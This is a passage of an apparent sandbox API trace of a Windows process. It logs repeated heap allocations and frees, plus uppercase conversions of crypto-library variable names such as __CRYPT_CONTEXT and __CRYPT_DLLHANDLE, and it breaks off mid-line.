[0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0091.683] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0091.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0091.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0091.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0091.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0091.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0091.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0091.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0091.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0091.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0091.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0091.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0091.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0091.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0091.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0091.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0091.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0091.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0091.691] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0091.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0091.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0091.692] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0091.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0091.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0091.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.694] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0091.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0091.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0091.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 